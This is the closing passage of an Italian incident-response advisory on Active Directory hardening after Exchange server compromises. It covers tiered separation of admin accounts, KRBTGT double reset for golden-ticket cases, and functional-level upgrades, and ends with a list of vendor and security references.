      Analisi del proprio processo di gestione delle credenziali amministrative e non al fine di identificare
         eventuali account non più necessari e/o dormienti.
      Applicazione (ove non presente) del modello di segmentazione delle risorse con privilegi amministrativi
         secondo quanto previsto dalle best practices Microsoft26 ovvero:
           Tier0: Amministratori di foresta. Fanno parte di questo livello tutti gli account e le risorse che
               direttamente o indirettamente controllano la Foresta i domini ed i domain controller Active Directory;
           Tier1: Amministratori dei servizi. Fanno parte di questo livello tutti gli account che direttamente o
               indirettamente controllano server di erogazione di servizi;
           Tier2: Amministratori di postazioni di lavoro. Fanno parte di questo livello tutti gli account e le risorse
               utilizzate per l’amministrazione delle postazioni di lavoro.
     Tutti gli account dovrebbero essere categorizzati all’interno di un livello in modo da realizzare la suddetta
     segregazione. In particolare:

        Tutti gli account inseriti all’interno di un livello dovrebbero essere utilizzati esclusivamente su postazioni
         appartenenti a tale. Dovrebbero essere implementate inoltre ACL (Access Control List) che prevengano
         l’errore umano impedendo che le stesse possano essere utilizzate in un differente livello;
        Gli utenti che necessitano di accedere a differenti livelli dovrebbero essere dotati di differenti account ed
         in particolare per il T0 anche di differenti postazioni di lavoro. Da quest’ultime non dovrà essere possibile
         la navigazione su Internet.

     Nel caso l’attività di analisi rilevi che la compromissione dell’infrastruttura sia tale da garantire all’attaccante il
     possesso di un “golden ticket” (ovvero della possibilità di impersonificare qualsiasi account, ed accedere a
     qualsiasi risorsa) si dovrà procedere alla predisposizione di un piano di risposta che preveda il doppio reset
     dell’account KRBTGT effettuato in totale disconnessione dalla rete Internet di tutte le postazioni di lavoro e
     server.

     Tale attività può anche essere effettuata nelle prime fasi della risposta ed a seguito della messa in
     esercizio/potenziamento delle capacità di monitoraggio specifico, senza operare la totale disconnessione dalla

26
 Nonostante Microsoft consigli un nuovo modello di sicurezza specifico per ambienti ibridi, il modello indicato resta valido
 in caso di infrastrutture Active Directory tradizionali (https://docs.microsoft.com/en-us/security/compass/esae-
 retirement)
                                                                                                                   14 di 16
rete Internet, al fine di costringere l’attaccante ad effettuare le operazioni necessarie a riottenere permessi
      amministrativi sull’infrastruttura ed avere quindi la possibilità di rilevare la tecnica utilizzata e le postazioni
      sicuramente compromesse da cui parte l’attività. È importante segnalare che la suddetta manovra può
      comportare disservizi sulle autenticazioni utente e sulla funzionalità dei servizi pertanto necessita di
      un’accurata pianificazione anche nell’ottica di evitare che l’attaccante abbia a disposizione dei sistemi di
      persistenza non rilevati e possa attraverso questi riprendere le attività.

      Si consiglia, ove possibile, di innalzare il livello funzionale dei domini Active Directory alla versione 201627
      (facendo attenzione al rispetto dei requisiti in termini di sistema operativo utilizzato per i domain controller e
      al rispetto del sistema operativo minimo per le postazioni inserite all’interno del dominio). In tale maniera sarà
      possibile beneficiare delle nuove funzionalità di protezione delle credenziali28 introdotte dal suddetto livello
      funzionale.

      Per i gestori di infrastrutture basate su prodotti Microsoft si consiglia inoltre di valutare quanto riportato nelle
      best practices rilasciate dallo stesso e disponibili al link:

      -   https://docs.microsoft.com/en-us/security/compass/compass

      in particolate nella sezione denominata “Privileged administration”.

27
     https://docs.microsoft.com/it-it/windows-server/identity/ad-ds/active-directory-functional-levels
28
     https://docs.microsoft.com/it-it/windows-server/security/credentials-protection-and-management/whats-new-in-
     credential-protection
                                                                                                                 15 di 16
FONTI E RIFERIMENTI

-   https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-
    vulnerabilities/
-   https://proxylogon.com/
-   https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
-   https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
-   https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b
-   https://docs.microsoft.com/en-us/powershell/module/exchange/set-oabvirtualdirectory?view=exchange-
    ps#parameters
-   https://attack.mitre.org/techniques/enterprise/
-   https://www.microsoft.com/en-us/download/details.aspx?id=36036
-   https://github.com/microsoft/CSS-Exchange/tree/main/Security
-   https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-
    2003/cc772829(v=ws.10)?redirectedfrom=MSDN
-   https://github.com/microsoft/CSS-Exchange/tree/main/Security#system-requirements
-   https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download
-   https://support.microsoft.com/kb/2520970
-   https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
    2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459
-   https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
    2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
-   https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
    2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
-   https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
    2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
-   https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-
    older-cumulative/ba-p/2192020
-   https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-
    in-microsoft-defender-antivirus/
-   https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/
-   https://docs.microsoft.com/it-it/windows-server/identity/ad-ds/active-directory-functional-levels
-   https://docs.microsoft.com/it-it/windows-server/security/credentials-protection-and-management/whats-new-in-
    credential-protection
-   https://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-
    the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf
-   https://www.microsoft.com/en-us/download/details.aspx?id=46899
-   https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-
    server-vulnerabilities/
-   https://docs.microsoft.com/en-us/security/compass/compass

                                                                                                        16 di 16
Puoi anche leggere